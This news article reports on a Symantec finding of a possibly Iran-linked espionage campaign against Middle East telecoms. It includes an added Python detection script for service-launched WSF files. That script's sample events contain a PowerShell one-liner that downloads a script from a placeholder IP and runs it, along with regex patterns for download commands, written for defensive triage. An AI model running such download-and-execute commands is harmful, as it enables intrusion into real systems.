New cyberespionage campaign discovered, possibly linked to Iran

A Symantec report reveals that telecom operators and IT service organizations across the Middle East have been targeted for months, with the threat actor appearing to be the one behind Operation Quicksand


Telecom operators and IT service organizations across the Middle East have been targeted by possibly Iran-linked malicious actors over the past six months, according to a new report by Symantec’s Threat Hunter Team.

The report suggests that the identity of the attackers – who have targeted Israel, Jordan, Kuwait, Saudi Arabia, the UAE, Pakistan, and also Thailand and Laos – remains unconfirmed at the moment. However, “there is some evidence to suggest a link to the Iranian Seedworm (aka MuddyWater).”

According to MITRE ATT&CK, MuddyWater “is an Iranian threat group that has primarily targeted Middle Eastern nations, and also European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors.”

MuddyWater, also known by the names Earth Vetala, MERCURY, TEMP.Zagros and Static Kitten, first appeared on the scene in 2018. Its main goal is believed to be espionage.

“After breaching a targeted network, the attackers typically attempt to steal credentials and move laterally across the network,” says the Symantec report.

“In some cases, the attackers may be using compromised organizations as stepping stones to additional victims. Furthermore, some targets may have been compromised solely to perform supply-chain-type attacks on other organizations.”

The attackers tend to deploy web shells onto Exchange Servers. The researchers describe one attack, from August 2021, where “the first evidence of compromise was the creation of a service to launch an unknown Windows Script File (WSF). The attackers used PowerShell to download another WSF and run it.”
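As an added illustration of how a defender might look for the two behaviours described above (this is not code from the Symantec report), the following Python scans constructed Windows event records for a newly installed service whose image path launches a .wsf via wscript/cscript, and for a PowerShell command line that downloads and runs another .wsf. The event field names, hostnames, service names and the 198.51.100.10 address are all constructed sample values, not indicators from the report.

```python
import re

# Constructed sample events (not from the Symantec report). Fields mirror the
# Windows System log 7045 (service installed) and Security 4688 (process created).
SAMPLE_EVENTS = [
    {"id": 7045, "host": "mail01", "service": "UpdateSvc",
     "image_path": r"cmd.exe /c wscript.exe C:\ProgramData\upd.wsf"},
    {"id": 4688, "host": "mail01", "process": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -c (New-Object Net.WebClient)"
                ".DownloadFile('http://198.51.100.10/a.wsf','C:\\ProgramData\\a.wsf');"
                " wscript C:\\ProgramData\\a.wsf"},
    {"id": 7045, "host": "fs02", "service": "Backup Agent",
     "image_path": r"C:\Program Files\Backup\agent.exe"},
    {"id": 4688, "host": "fs02", "process": "powershell.exe",
     "cmdline": "powershell -File C:\\Scripts\\rotate-logs.ps1"},
]

WSF_RE = re.compile(r"\.wsf\b", re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r"\b[wc]script(\.exe)?\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    re.IGNORECASE)

def classify(event):
    """Return a list of finding strings for one event (empty if nothing matched)."""
    findings = []
    if event["id"] == 7045:
        path = event.get("image_path", "")
        if WSF_RE.search(path) and SCRIPT_HOST_RE.search(path):
            findings.append(f"{event['host']}: service '{event['service']}' launches a WSF: {path}")
    elif event["id"] == 4688 and event.get("process", "").lower() == "powershell.exe":
        cmd = event.get("cmdline", "")
        if DOWNLOAD_RE.search(cmd) and WSF_RE.search(cmd):
            findings.append(f"{event['host']}: PowerShell downloads and runs a WSF: {cmd[:70]}")
    return findings

def scan(events):
    """Run classify over all events; return (findings, hosts with both behaviours)."""
    findings, per_host = [], {}
    for ev in events:
        hits = classify(ev)
        findings.extend(hits)
        if hits:
            per_host.setdefault(ev["host"], set()).add(ev["id"])
    # A host showing both the service-launched WSF and the PowerShell download
    # matches the chain the article describes and deserves priority triage.
    chained = sorted(h for h, ids in per_host.items() if ids == {7045, 4688})
    return findings, chained

if __name__ == "__main__":
    found, hosts = scan(SAMPLE_EVENTS)
    for f in found:
        print("ALERT:", f)
    print("hosts with full chain:", hosts)
```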

Symantec’s research team discovered that two IP addresses used in this campaign have been previously linked to Seedworm activity. Yet, they write, “Seedworm is known to regularly switch its infrastructure, meaning conclusive attribution cannot be made.”

In an October 2020 report, Symantec’s Threat Hunter Team warned that Seedworm has been very active over the past few months, with attacks launched against multiple targets in the Middle East, including government organizations. Attacks were discovered against targets in Iraq, Turkey, Kuwait, the United Arab Emirates, and Georgia.

A few days prior to that report, the ClearSky Research Team reported that in September 2020 they identified a new campaign dubbed Operation Quicksand, which they attributed to MuddyWater. The campaign targeted “many prominent Israeli organizations”. According to ClearSky, “MuddyWater was previously exposed as a contractor for the IRGC (Islamic Republic Guard Corps).”

ClearSky’s assessment was that the group was attempting to carry out destructive attacks while disguising them as ransomware. It also identified that the group employed a variant of PowGoop, a fake Google Update mechanism.
